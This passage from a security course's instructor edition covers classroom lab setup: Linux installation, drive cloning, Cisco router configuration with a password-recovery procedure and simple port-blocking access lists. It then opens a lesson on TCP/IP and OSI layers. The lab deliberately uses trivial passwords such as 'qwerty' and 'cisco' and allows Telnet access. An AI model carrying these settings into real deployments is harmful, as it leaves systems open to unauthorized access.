34. Specify the password for the built-in Root account to be qwerty and clickNext. You do not have to create any more accounts at this stage.

35. Accept the defaults for Authentication Configuration, and click Next.

36. When selecting Package Groups, scroll down and select Everything, andthen click Next to do a complete install of all packages.

37. At the About To Install screen, click Next, and wait for the install to gothrough its steps. Depending upon the CPU, this could take anywhere from45 to 90 minutes. Change disks when prompted (you will need to use allthree disks).

38. For the very first time you do this install, create a boot disk, as you haveno way of knowing at this point whether you can successfully boot from thehard drive or not. After you are done creating the boot disk, you will beprompted for the X configuration.

39. For the video card selection, browse the choices and select the option thatmatches the video card installed in the computer. Sometimes there areproblems here, even if the exact model is found. The way to get around thisis to choose Generic SVGA, but only as a last resort. Click Next.

40. When the monitor is probed, you may or may not see the right one. Acceptthe defaults here.

41. Specify a resolution of 800x600x16-bit color. Most mid-range projectors donot handle higher resolutions. Do not click the Test button, as it might causethe installation to go into a loop, forcing you to have to abort the install.

42. Select the login type to be Text, and click Next. This will at least help youto get started if you have any problems with the GUI.

43. Click Exit.

About This Course xxxvii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 39: SCNP Hardening

44. As the machine reboots, remove the floppy disk. The CD-ROM will beejected automatically; remove it and close the CD drawer.

45. When the GRUB loader is displayed, choose Red Hat Linux to test theinstallation.

46. At the login prompt, enter the username root and password qwerty toverify that you can log in.

47. Enter startx to test the GUI.

48. After you have verified the Linux installation, change the default login typeto be GUI. To do this, you will need to edit the file /etc/inittab to changethe line id:3:initdefault: to read id:5:initdefault:, andreboot the computer.

49. At the welcome screen, click Forward.

50. If necessary, verify the date and time, and click Forward.

51. If any hardware, such as the sound card, is detected, either test it or ignoreit for now. Click Forward.

52. If you are prompted to register, click No, I Do Not Want To Register andclick Forward.

53. If additional software options are presented, ignore them. Click Forwardtwice.

54. Log in as root again to test the GUI login.

55. If you are not supplying the Linux tools on a CD-ROM or shared folder,copy the Linux tools to the hard drive.

56. Shut down the system.

Cloning the Hard DrivesNow that the installation of the operating systems is completed on one computer,the hard drive is ready to be cloned for use with all of the student computers, aswell as the instructor computer. Please look after this disk well (we’ll refer to itas the source hard drive), as it will serve you for many class preparations. Theonly thing to watch out for, if you have used evaluation versions, is the 120-daytime limit on the Windows 2000 operating system.

Norton’s Ghost is a good product for cloning. If you opt not to use Sysprep, youwill also need to use a SID-changer to change the SIDs for the Windows 2000Server install. Norton’s Ghostwalk is a good product for changing SIDs. You canalso download a free SID changer from www.sysinternals.com/ntw2k/source/newsid.shtml. As for Linux—sometimes Linux will not boot off a cloned harddrive. If you come across such problems, perform an install and choose theupgrade option. This takes about 10 minutes (as opposed to a 45-minute fullinstall).

Every computer with the cloned hard drive must be manually reconfigured. Youwill have to keep track of variables such as computer names, host names, andTCP/IP configuration parameters. Cloning and configuration takes approximately30 minutes per computer.

xxxviii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 40: SCNP Hardening

1. Insert the master (source) hard drive into the Primary Master remov-able bay in your cloning machine.

2. Insert the blank (destination) hard drive into the Secondary Masterremovable bay in your cloning machine.

3. Boot using a bootable floppy disk, and run the cloning program. We rec-ommend Norton’s Ghost utility.

4. Specify the source and destination drives.

5. IMPORTANT: Do not accept the partition sizes on the destinationdrive—you must match the source drive’s partition sizes; that is, 2600MB Primary, 100 MB (Linux /boot logical drive), 256 MB (Linux Swaplogical drive), and 5+ GB (Linux / logical drive).

6. When done selecting, click Continue and wait for the cloning process tocomplete.

After Cloning the Hard DrivesPerform the following steps for each cloned hard drive.

1. Insert the cloned hard drive into one of the student machines or theinstructor machine.

2. Boot to Windows 2000 Server. Because you ran the Sysprep utility beforecloning the hard drive, it should now run a short setup routine.

a. When you are prompted for a new computer name, enter a name asdescribed in Figure 0-2. This will also create a new SID for eachmachine.

b. Change the IP addresses and default gateway as described in Figure0-2.

c. Open the Network And Dial-up Connections Control Panel, right-click Local Area Connection 1, and display its properties. CheckShow Icon In Taskbar When Connected, and click OK. Determinewhat this interface is connected to, and then rename the connectionClassroom Hub or Partner, accordingly.

d. In the Network And Dial-up Connections Control Panel, right-clickLocal Area Connection 2, and display its properties. Check ShowIcon In Taskbar When Connected, and click OK. Determine whatthis interface is connected to, and then rename the connectionClassroom Hub or Partner, accordingly.

3. Boot to Linux. Change the host name and IP addresses as described inFigure 0-2.

a. If the machine hangs on GRUB, insert the Linux boot CD-ROM,reboot the machine, and upgrade your install. This should take onlya few minutes.

b. If you need to change the monitor resolution in Linux, run the Xconfigurator. You can access Xconf by running setup from a terminal.

Estimated minimum timefor cloning: 10 minutes perhard drive. If you canimage the source harddrive to a file server andmulticast this image overthe network to all thestudent machines,estimated minimum time: 5minutes per hard drive.

Estimated minimum timefor manual reconfigurationof cloned hard drives: 10minutes per workstation,but if you can work inparallel (such asdownloading the OSimages over a network),you should be able to setup 12 computers with theappropriate configuration inunder 4 hours.

About This Course xxxix

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 41: SCNP Hardening

4. Shut down the computer.

Configuring Cisco RoutersThree Cisco routers are used in the class. The 2501 series is preferred, with aminimum IOS version of 12.2 (with IPSec/SSH support).

The decision whether to allow or not allow the classroom machines to use theInternet is up to the Internet access policies of your location. You can configureNAT on the Instructor Machine to allow the class members to use the Internet.The default route configuration provided here assumes that you will have theInstructor Machine perform NAT. Alternatively, the CENTER router, the Instruc-tor Machine and another device with NAT capabilities can all be connected to ahub. Whichever method you choose, just enter the appropriate configuration state-ment on the CENTER router.

The following shows an overview of the configuration requirements of eachrouter. They are to run IP with access lists configured and RIP as the routingprotocol. Configuration beyond what is shown here is not required. Students willbe asked to connect to the routers, so it is advised that the CENTER router theinstructor uses have a different and more complex Enable Password. Studentsshould be allowed to Telnet to all three routers.

• The LEFT router is for one half of the class to connect through. It shouldhave the following configuration:

— Hostname and Routername: LEFT

— Access List Configuration:

Access-list 123 deny tcp any any eq 25

Access-list 123 permit ip any any

INT S0: ip access-group 123 in

• The CENTER router is for the Instructor to connect to the class. It shouldhave the following configuration:

— Hostname and Routername: CENTER

— Access List Configuration:

Access-list 155 deny tcp any any eq 20

Access-list 155 deny tcp any any eq 21

Access-list 155 permit ip any any

INT S0: ip access-group 155 in

INT S1: ip access-group 155 in

• The RIGHT router is for the other half of the class to connect through. Itshould have the following configuration:

— Hostname and Routername: RIGHT

— Access List Configuration:

Access-list 145 deny tcp any any eq 25

Access-list 145 permit ip any any

INT S1: ip access-group 145 in

Estimated minimum timefor router setup: 1 hour.

xl Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 42: SCNP Hardening

The detailed configuration procedures are listed here in three main categories:

• Physical configuration

• Router setup

• Access list configuration

Physical Router ConfigurationThe LEFT router is to be connected to the CENTER router via a Cisco serialcable. The RIGHT router is also to be connected to the CENTER router via aCisco serial cable. All Ethernet connections are to be made through standard10/100 BaseT cables.

1. Study the class setup diagram provided in Figure 0-1.

2. Physically connect the three routers to each other, using serial crossovercables, so that the router designated as CENTER controls the clock rate.To do this, connect the DCE end of the serial cable to the serial interfaceson the CENTER router and the DTE ends to the LEFT and RIGHT’s appro-priate serial interfaces.

3. Connect the Ethernet interface on the CENTER router to the instructormachine via a crossover Ethernet cable.

4. Connect the Ethernet interfaces on the LEFT and RIGHT routers totheir respective hubs serving their side of the classroom.

Before You Start the Router SetupAll routers should be cleared of any configs before setting up the class. If youhave a configured router but you don’t know the password, perform the followingsteps:

1. Console into the router.

2. Enter the sh ver command, and record the configuration register setting(usually 0x2102).

3. Power down the router, and then power it back up.

4. After the amount of main memory is displayed, press the Break key (orCtrl+Break). You should see the > prompt with no router name.

5. Enter o/r 0x42 to boot from flash or o/r 0x41 to boot from ROM. Typi-cally, you would boot from flash if it were intact.

6. Enter i to force the router to reboot and ignore its saved config.

About This Course xli

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 43: SCNP Hardening

7. Answer no to all setup questions.

8. When the Router> prompt is displayed, enter enable to switch to enablemode. The Router# prompt should now be displayed. Once you are in enablemode, you can view and change the password, and you can erase the config.

9. To view the password, enter show config at the Router# prompt.

10. To change the password, from the Router# prompt:

a. Enter config mem to copy NVRAM to mem.

b. Enter wr term.

c. Enter config term to enter config mode. The Router(config)# prompt isnow displayed.

d. If an enable secret password is set, enter enable secret newpassword,or if there is no enable secret password, enter enable passwordnewpassword, where newpassword is the new password you want touse.

e. Press Ctrl+Z to exit config mode. The Router# prompt is nowdisplayed.

f. Enter write mem to commit the changes to mem. You should now beable to console in and configure the router.

11. To erase the config, from the Router# prompt:

a. Enter write erase.

b. Enter config term to enter config mode. The Router(config)# prompt isnow displayed.

c. Enter config-register 0x2102 or whatever the configuration register set-ting was when you began.

d. Press Ctrl+Z to exit config mode. The Router# prompt is nowdisplayed.

e. Enter reload.

f. When you are prompted to save the modified system configuration,enter y.

g. When you are prompted to proceed with the reload, enter y.

Setup for CENTER RouterThe CENTER router is used by the instructor to connect to the rest of the class.To set up the CENTER router:

1. Boot up the router and console into it. You should be prompted to enterthe initial configuration dialog. (If you are not, follow the procedures listedpreviously in the “Before You Start the Router Setup” section.)

2. When you are prompted:

a. To enter the initial configuration dialog, enter y.

b. To enter basic management setup, enter n.

c. As to whether you want to see the current interface summary, pressEnter.

xlii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 44: SCNP Hardening

d. To enter the host name for [Router], enter CENTER.

e. To enter the enable secret password, enter instructor.

f. To enter the enable password, enter cisco1.

g. To enter the virtual terminal password, enter 2501.

h. To configure SNMP network management, enter n.

i. To configure LAT, enter n.

j. To configure bridging, press Enter to accept the default of No.

k. To configure AppleTalk, press Enter to accept the default of No.

l. To configure DECnet, press Enter to accept the default of No.

m. To configure IP, press Enter to accept the default of Yes.

n. To configure IGRP routing, enter n.

o. To configure RIP routing, enter y.

p. To configure CLNS, press Enter to accept the default of No.

q. To configure IPX, press Enter to accept the default of No.

r. To configure Vines, press Enter to accept the default of No.

s. To configure XNS, press Enter to accept the default of No.

t. To configure Apollo, press Enter to accept the default of No.

u. If you are prompted to configure BRI, select switch type 0.

v. To configure the Ethernet0 interface, press Enter to accept the defaultof Yes.

w. To configure IP on this interface, press Enter to accept the default ofYes.

x. For the IP address for this interface, enter 172.17.0.1.

y. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.0.0.

z. To configure the Serial0 interface, press Enter to accept the default ofYes.

aa. To configure IP on this interface, press Enter to accept the default ofYes.

ab. To configure IP unnumbered on this interface, press Enter to accept thedefault of No.

ac. For the IP address for this interface, enter 192.168.20.2.

ad. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.255.0.

ae. To configure the Serial1 interface, press Enter to accept the default ofYes.

af. To configure IP on this interface, press Enter to accept the default ofYes.

ag. To configure IP unnumbered on this interface, press Enter to accept thedefault of No.

ah. For the IP address for this interface, enter 192.168.10.2.

ai. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.255.0.

About This Course xliii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 45: SCNP Hardening

aj. If you are prompted to configure any other serial interfaces, enter nuntil a configuration command script is generated, and you areprompted to make a selection regarding the next action.

ak. To enter your selection, press Enter to accept the default of 2. Youshould see a message indicating that the router is building theconfiguration. When the configuration build is complete, an OK mes-sage is displayed.

al. To press RETURN to get started, press Enter. The CENTER> promptshould now be displayed.

3. At the CENTER> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter instructor. The CENTER#prompt should now be displayed.

5. At the CENTER# prompt, enter conf t to enter config mode. TheCENTER(config)# prompt should now be displayed.

6. At the CENTER(config)# prompt:

a. Enter no ip domain lookup.

b. Enter int s0 and the CENTER(config-if)# prompt should now bedisplayed.

7. At the CENTER(config-if)# prompt:

a. Enter no shut.

b. Enter clo ra 4000000.

c. Enter ban 10000000.

d. Enter int s1.

e. Enter no shut.

f. Enter clo ra 4000000.

g. Enter ban 10000000.

h. Enter exit and the CENTER(config)# prompt is now displayed.

8. At the CENTER(config)# prompt:

a. Enter ip route 0.0.0.0 0.0.0.0 172.17.10.1.

b. Enter exit and the CENTER# prompt is now displayed.

9. At the CENTER# prompt:

a. Enter sh run and you should see a message indicating that the router isbuilding the configuration.

b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to acceptthe default of startup-config. You should again see a message indicating thatthe router is building the configuration.

xliv Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 46: SCNP Hardening

Setup for LEFT RouterThe LEFT router is used by half of the students to connect to the rest of theclass. To set up the LEFT router:

1. Boot up the router and console into it. You should be prompted to enterthe initial configuration dialog. (If you are not, follow the procedures listedpreviously in the “Before You Start the Router Setup” section.)

2. When you are prompted:

a. To enter the initial configuration dialog, enter y.

b. To enter basic management setup, enter n.

c. As to whether you want to see the current interface summary, pressEnter.

d. To enter the host name for [Router], enter LEFT.

e. To enter the enable secret password, enter cisco.

f. To enter the enable password, enter cisco1.

g. To enter the virtual terminal password, enter 2501.

h. To configure SNMP network management, enter n.

i. To configure LAT, enter n.

j. To configure bridging, press Enter to accept the default of No.

k. To configure AppleTalk, press Enter to accept the default of No.

l. To configure DECnet, press Enter to accept the default of No.

m. To configure IP, press Enter to accept the default of Yes.

n. To configure IGRP routing, enter n.

o. To configure RIP routing, enter y.

p. To configure CLNS, press Enter to accept the default of No.

q. To configure IPX, press Enter to accept the default of No.

r. To configure Vines, press Enter to accept the default of No.

s. To configure XNS, press Enter to accept the default of No.

t. To configure Apollo, press Enter to accept the default of No.

u. If you are prompted to configure BRI, select switch type 0.

v. To configure the Ethernet0 interface, press Enter to accept the defaultof Yes.

w. To configure IP on this interface, press Enter to accept the default ofYes.

x. For the IP address for this interface, enter 172.16.0.1.

y. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.0.0.

z. To configure the Serial0 interface, press Enter to accept the default ofYes.

aa. To configure IP on this interface, press Enter to accept the default ofYes.

ab. To configure IP unnumbered on this interface, press Enter to accept thedefault of No.

About This Course xlv

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 47: SCNP Hardening

ac. For the IP address for this interface, enter 192.168.10.1.

ad. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.255.0.

ae. To configure the Serial1 interface, enter n.

af. If you are prompted to configure any other serial interfaces, enter nuntil a configuration command script is generated, and you areprompted to make a selection regarding the next action.

ag. To enter your selection, press Enter to accept the default of 2. Youshould see a message indicating that the router is building theconfiguration. When the configuration build is complete, an OK mes-sage is displayed.

ah. To press RETURN to get started, press Enter. The LEFT> promptshould now be displayed.

3. At the LEFT> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter cisco. The LEFT# promptshould now be displayed.

5. At the LEFT# prompt, enter conf t to enter config mode. TheLEFT(config)# prompt should now be displayed.

6. At the LEFT(config)# prompt:

a. Enter no ip domain lookup.

b. Enter int s0 and the LEFT(config-if)# prompt should now be displayed.

7. At the LEFT(config-if)# prompt:

a. Enter no shut.

b. Enter ban 10000000.

c. Enter exit and the LEFT(config)# prompt is now displayed.

8. At the LEFT(config)# prompt:

a. Enter ip route 0.0.0.0 0.0.0.0 192.168.10.2.

b. Enter exit and the LEFT# prompt is now displayed.

9. At the LEFT# prompt:

a. Enter sh run and you should see a message indicating that the router isbuilding the configuration.

b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to acceptthe default of startup-config. You should again see a message indicating thatthe router is building the configuration.

Setup for RIGHT RouterThe RIGHT router is used by half of the students to connect to the rest of theclass. To set up the RIGHT router:

xlvi Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 48: SCNP Hardening

1. Boot up the router and console into it. You should be prompted to enterthe initial configuration dialog. (If you are not, follow the procedures listedpreviously in the “Before You Start the Router Setup” section.)

2. When you are prompted:

a. To enter the initial configuration dialog, enter y.

b. To enter basic management setup, enter n.

c. As to whether you want to see the current interface summary, pressEnter.

d. To enter the host name for [Router], enter RIGHT.

e. To enter the enable secret password, enter cisco.

f. To enter the enable password, enter cisco1.

g. To enter the virtual terminal password, enter 2501.

h. To configure SNMP network management, enter n.

i. To configure LAT, enter n.

j. To configure bridging, press Enter to accept the default of No.

k. To configure AppleTalk, press Enter to accept the default of No.

l. To configure DECnet, press Enter to accept the default of No.

m. To configure IP, press Enter to accept the default of Yes.

n. To configure IGRP routing, enter n.

o. To configure RIP routing, enter y.

p. To configure CLNS, press Enter to accept the default of No.

q. To configure IPX, press Enter to accept the default of No.

r. To configure Vines, press Enter to accept the default of No.

s. To configure XNS, press Enter to accept the default of No.

t. To configure Apollo, press Enter to accept the default of No.

u. If you are prompted to configure BRI, select switch type 0.

v. To configure the Ethernet0 interface, press Enter to accept the defaultof Yes.

w. To configure IP on this interface, press Enter to accept the default ofYes.

x. For the IP address for this interface, enter 172.18.0.1.

y. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.0.0.

z. To configure the Serial0 interface, enter n.

aa. To configure the Serial1 interface, press Enter to accept the default ofYes.

ab. To configure IP on this interface, press Enter to accept the default ofYes.

ac. To configure IP unnumbered on this interface, press Enter to accept thedefault of No.

ad. For the IP address for this interface, enter 192.168.20.1.

ae. For the subnet mask for this interface, press Enter to accept the defaultof 255.255.255.0.

About This Course xlvii

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 49: SCNP Hardening

af. If you are prompted to configure any other serial interfaces, enter nuntil a configuration command script is generated, and you areprompted to make a selection regarding the next action.

ag. To enter your selection, press Enter to accept the default of 2. Youshould see a message indicating that the router is building theconfiguration. When the configuration build is complete, an OK mes-sage is displayed.

ah. To press RETURN to get started, press Enter. The RIGHT> promptshould now be displayed.

3. At the RIGHT> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter cisco. The RIGHT# promptshould now be displayed.

5. At the RIGHT# prompt, enter conf t to enter config mode. TheRIGHT(config)# prompt should now be displayed.

6. At the RIGHT(config)# prompt:

a. Enter no ip domain lookup.

b. Enter int s1 and the RIGHT(config-if)# prompt should now bedisplayed.

7. At the RIGHT(config-if)# prompt:

a. Enter no shut.

b. Enter ban 10000000.

c. Enter exit and the RIGHT(config)# prompt is now displayed.

8. At the RIGHT(config)# prompt:

a. Enter ip route 0.0.0.0 0.0.0.0 192.168.20.2.

b. Enter exit and the RIGHT# prompt is now displayed.

9. At the RIGHT# prompt:

a. Enter sh run and you should see a message indicating that the router isbuilding the configuration.

b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to acceptthe default of startup-config. You should again see a message indicating thatthe router is building the configuration.

Configuring the Access ListsAfter the initial router setup and the basic configuration have been completed onall three routers, you need to enter the access lists for each of the routers. To doso:

1. To complete the LEFT Router Access Lists:

xlviii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 50: SCNP Hardening

a. At the LEFT# prompt, enter conf t to switch to config mode. TheLEFT(config)# prompt is now displayed.

b. At the LEFT(config)# prompt, enter access-list 123 deny tcp any anyeq 25.

c. At the LEFT(config)# prompt, enter access-list 123 permit ip any any.

d. At the LEFT(config)# prompt, enter int S0 to configure the interface.The LEFT(config-if)# prompt is now displayed.

e. At the LEFT(config-if)# prompt, enter ip access-group 123 in.

f. At the LEFT(config-if)# prompt, press Ctrl+Z to leave config mode.The LEFT# prompt is now displayed.

g. At the LEFT# prompt, enter copy ru st and save the configurationchanges to startup-config.

2. To complete the RIGHT Router Access Lists:

a. At the RIGHT# prompt, enter conf t to switch to config mode. TheRIGHT(config)# prompt is now displayed.

b. At the RIGHT(config)# prompt, enter access-list 145 deny tcp any anyeq 25.

c. At the RIGHT(config)# prompt, enter access-list 145 permit ip anyany.

d. At the RIGHT(config)# prompt, enter int S1 to configure the interface.The RIGHT(config-if)# prompt is now displayed.

e. At the RIGHT(config-if)# prompt, enter ip access-group 145 in.

f. At the RIGHT(config-if)# prompt, press Ctrl+Z to leave config mode.The RIGHT# prompt is now displayed.

g. At the RIGHT# prompt, enter copy ru st and save the configurationchanges to startup-config.

3. To complete the CENTER Router Access Lists:

a. At the CENTER# prompt, enter conf t to switch to config mode. TheCENTER(config)# prompt is now displayed.

b. At the CENTER(config)# prompt, enter access-list 155 deny tcp anyany eq 20.

c. At the CENTER(config)# prompt, enter access-list 155 deny tcp anyany eq 21.

d. At the CENTER(config)# prompt, enter access-list 155 permit ip anyany.

e. At the CENTER(config)# prompt, enter int S1 to configure the S1interface. The CENTER(config-if)# prompt is now displayed.

f. At the CENTER(config-if)# prompt, enter ip access-group 155 in.

g. At the CENTER(config-if)# prompt, enter int S0 to configure the S0interface.

h. At the CENTER(config-if)# prompt, enter ip access-group 155 in.

i. At the CENTER(config-if)# prompt, press Ctrl+Z to leave configmode. The CENTER# prompt is now displayed.

About This Course xlix

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 51: SCNP Hardening

j. At the CENTER# prompt, enter copy ru st and save the configurationchanges to startup-config.

4. Test the classroom setup, and troubleshoot as necessary. Once physicalconnectivity issues have been sorted out, you should be able to ping fromone side of the classroom to the other. Specifically, the instructor machineshould be able to ping every student machine and vice versa. Studentmachines from the left side of the classroom should be able to ping studentmachines on the right side of the classroom and vice versa.

List of Additional FilesPrinted with each lesson is a list of files students open to complete the tasks inthat lesson. Many tasks also require additional files that students do not open, butare needed to support the file(s) students are working with. These supporting filesare included with the student data files on the course CD-ROM or data disk. Donot delete these files.

HOW TO USE THIS BOOKYou can use this book as a learning guide, a review tool, and a reference.

As a Learning GuideEach lesson covers one broad topic or set of related topics. Lessons are arrangedin order of increasing proficiency with Hardening the Infrastructure; skills youacquire in one lesson are used and developed in subsequent lessons. For this rea-son, you should work through the lessons in sequence.

We organized each lesson into explanatory topics and step-by-step activities. Top-ics provide the theory you need to master Hardening the Infrastructure, activitiesallow you to apply this theory to practical hands-on examples.

Through the use of sample files, hands-on activities, illustrations that give youfeedback at crucial steps, and supporting background information, this book pro-vides you with the foundation and structure to learn about Hardening theInfrastructure quickly and easily.

As a Review ToolAny method of instruction is only as effective as the time and effort you are will-ing to invest in it. For this reason, we encourage you to spend some timereviewing the book’s more challenging topics and activities.

As a ReferenceYou can use the Concepts sections in this book as a first source for definitions ofterms, background information on given topics, and summaries of procedures.

l Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 52: SCNP Hardening

About This Course li

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 53: SCNP Hardening

lii Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 54: SCNP Hardening

Advanced TCP/IP

OverviewThere is one primary set of protocols that runs networks and the Internettoday. In this lesson, you will work with those protocols: the TransmissionControl Protocol (TCP) and the Internet Protocol (IP). In order to managethe security of a network, you must become familiar with the details of howTCP/IP functions, including core concepts, such as addressing andsubnetting, and advanced concepts, such as session establishment and packetanalysis.

ObjectivesTo better understand advanced TCP/IP concepts, you will:

1A Define the core concepts of TCP/IP.

Given a machine running TCP/IP, you will define the core concepts ofTCP/IP, including the layering models, RFCs, addressing and subnetting,VLSM and CIDR, and the TCP/IP suite.

1B Analyze sessions of TCP.

Given a Windows 2000 computer, you will examine control flags,sequence numbers, and acknowledgement numbers, and you will use Net-work Monitor to view and analyze all of the fields of the three-wayhandshake and session teardowns.

1C Analyze IP.

Given a Windows 2000 computer, you will use Network Monitor to viewand analyze all the fields of IP.

1D Analyze ICMP.

Given a Windows 2000 computer, you will use Network Monitor to viewand analyze all the fields of ICMP.

1E Analyze TCP.

Given a Windows 2000 computer, you will use Network Monitor to viewand analyze all the fields of TCP.

1F Analyze UDP.

Given a Windows 2000 computer, you will use Network Monitor to viewand analyze all the fields of UDP.

Data Filestftp.capfragment.capping.txtping.capftp.txtftp.cap

Lesson Time6 hours

LESSON

1

Lesson 1: Advanced TCP/IP 1

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 55: SCNP Hardening

1G Analyze fragmentation.

Given a Windows 2000 computer, you will use Network Monitor to viewand analyze network traffic fragmentation.

1H Complete a full session analysis.

Given a Windows 2000 computer, you will use Network Monitor to viewand analyze a complete FTP session, frame by frame.

1I Examine the concepts of Internet Protocol version 6.

In this topic, you will be introduced to the fundamental concepts sur-rounding Internet Protocol version 6, and its implementation innetworking.

2 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 56: SCNP Hardening

Topic 1ATCP/IP ConceptsIn order for two hosts to communicate, there must first be an agreed-upon methodof communication for both hosts to use. The protocol that the Internet was builton, and the protocol that all hosts on the Internet use is TCP/IP, or TransmissionControl Protocol/Internet Protocol. Because the two hosts agree on the protocolthey will use, we can go right into the details of the protocol itself.

The TCP/IP ModelIn order for data to move from one host to another, it must be transmitted andreceived. There are several ways that this could happen, in theory.

• The data file could be sent as a whole file, intact, from one host to another.

• The data file could be split in half and sent, sending and receiving two equalsized pieces.

• The data file could be split into many smaller pieces, all sent and received ina specific sequence.

It is this last method that is actually used. For example, if a user is at a host andwants to view a Web page on a different host, the request and subsequentresponse will take many small steps to complete. In Figure 1-1, you can see thefour layers of the TCP/IP Model, along with the Web browser’s request for a Webpage going to the Web server.

Figure 1-1: A Web request moving along the TCP/IP Model.

The four layers of the TCP/IP Model are:

• The Application Layer

• The Transport Layer

• The Internet Layer (also called the Network Layer)

• The Network Access Layer (also called the Link Layer)

Many of the Concepts inthis topic were covered inthe prerequisite courses,but are provided here forreview.

host:A single computer orworkstation; it can beconnected to a network.

server:A system that providesnetwork service such as diskstorage and file transfer, or aprogram that provides such aservice. A kind of daemonthat performs a service forthe requester, which oftenruns on a computer otherthan the client machine.

A Web Request MovingAlong the TCP/IP Model

Lesson 1: Advanced TCP/IP 3

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 57: SCNP Hardening

The reason that there are alternate names for these layers is that there has neverbeen an agreed-upon standard for the names to which the industry agrees. Eachof these layers are detailed as follows:

• The Application Layer is the highest layer in the model, and communicateswith the software that requires the network. In our example, the software isthe Web page request from a browser.

• The Transport Layer is where the reliability of the communication is dealtwith. There are two protocols that work at this layer, TCP (TransmissionControl Protocol) and UDP (User Datagram Protocol). An immediate differ-ence between the two is that TCP does provide for reliable delivery of data,whereas UDP provides no such guarantee.

• The Internet Layer (or Network Layer) provides the mechanism required toaddress and move the data from one host to the other. The primary protocolyou will examine at this layer is IP (Internet Protocol).

• The Network Access Layer (or Link Layer) is where the data communicationinteracts with the physical medium of the network. This is the layer thatdoes the actual sending and receiving of the data.

As you saw in Figure 1-1, as the Web page request was initiated on the host, itmoved down the layers, was transmitted across the network, and moved up thelayers on the Web server. These are the layers on which all network communica-tion using TCP/IP is based. There is a different set of layers, however, called theOSI Model.

The OSI ModelThe TCP/IP Model works well for TCP/IP communications, but there are manyprotocols and methods of communication other than TCP/IP. A standard wasneeded to encompass all of the communication protocols. The standard developedby the International Organization for Standardization (ISO) is called the OSIModel.

The Open Systems Interconnect (OSI) Model has seven layers, compared to thefour layers of the TCP/IP Model. The seven layers of the OSI Model are:

• The Application Layer

• The Presentation Layer

• The Session Layer

• The Transport Layer

• The Network Layer

• The Data Link Layer

• The Physical Layer

The TCP/IP Layers

network:Two or more machines

interconnected forcommunications.

OSI:(Open Systems

Interconnection) A set ofinternationally accepted andopenly developed standards

that meet the needs ofnetwork resource

administration and integratednetwork components.

4 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 58: SCNP Hardening

The names of these layers are fixed, as this is an agreed upon standard. Thedetails of each layer are as follows:

• The Application Layer is the highest layer of the OSI Model, and deals withinteraction between the software and the network.

• The Presentation Layer is responsible for data services such as data compres-sion and data encryption/decryption.

• The Session Layer is responsible for establishing, managing (such as packetsize), and ending a session between two hosts.

• The Transport Layer is responsible for error control and data recoverybetween two hosts. Both TCP and UDP work at this layer.

• The Network Layer is responsible for logical addressing, routing, and for-warding of datagrams. IP works at this layer.

• The Data Link Layer is responsible for packaging data frames for transmis-sion on the physical medium. Error control is added at this layer, often inthe form of a Cyclic Redundancy Check (CRC). This layer is subdividedinto the LLC (Logical Link Control) and MAC (Media Access Control)sublayers. The MAC sublayer is associated with the physical address of thenetwork device and the LLC sublayer makes the association between thisphysical address (such as the 48-bit MAC address if using Ethernet) and thelogical address (such as the 32-bit IP address if using IP) at the NetworkLayer.

• The Physical Layer is responsible for the actual transmission and receipt ofthe data bit stream on the physical medium.

The OSI Model and the TCP/IP Model do fit together. In Figure 1-2, you can seethat the two primary layers of concern in the TCP/IP Model (the Transport andInternet Layers), match directly with the Transport and Network Layers of theOSI Model, while the other two TCP/IP Model layers encompass two or morelayers of the OSI Model.

Figure 1-2: A comparison of the OSI and TCP/IP Models.

The OSI Layers

packet:A block of data sent over thenetwork transmitting theidentities of the sending andreceiving stations, error-control information, andmessage.

A Comparison of the OSIand TCP/IP Models

Lesson 1: Advanced TCP/IP 5

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 59: SCNP Hardening

As the data from one host flows down the layers of the model, each layerattaches a small piece of information relevant to that layer. This attachment iscalled the header. For example, the Network Layer header will identify the logicaladdresses (such as IP addresses) used for this transmission. This process of add-ing a header at each layer is called encapsulating. Figure 1-3 shows a visualrepresentation of the header and the encapsulation process.

Figure 1-3: Headers and the encapsulation process as data moves down the stack.

When the second host receives the data, and as the data moves up the layers,each header will let the host know how to handle this piece of data. After all theheaders have been removed, the receiving host is left with the data as it was sent.

